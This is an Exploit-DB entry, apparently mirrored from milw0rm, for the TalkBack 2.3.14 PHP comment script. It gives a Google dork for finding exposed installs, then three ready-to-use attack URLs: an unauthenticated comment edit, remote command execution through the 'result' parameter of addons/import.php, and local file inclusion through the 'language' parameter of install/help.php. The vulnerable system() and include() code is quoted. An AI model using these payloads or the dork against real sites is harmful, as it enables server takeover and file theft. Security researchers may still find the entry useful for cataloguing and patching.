exploit-db-mirror/exploits/php/webapps/9095.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

21 lines
No EOL
703 B
Text

JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
Code;
$last_line = system($command, $result);
Local File ~[+]
Note : if floder install not deleted
http://localhost/test/talkback/install/help.php?language=[File]
code;
$file = "../language/{$_REQUEST['language']}.php";
if (!is_file($file))
exit("Language file '$file' does not exist");
include ($file);
# milw0rm.com [2009-07-09]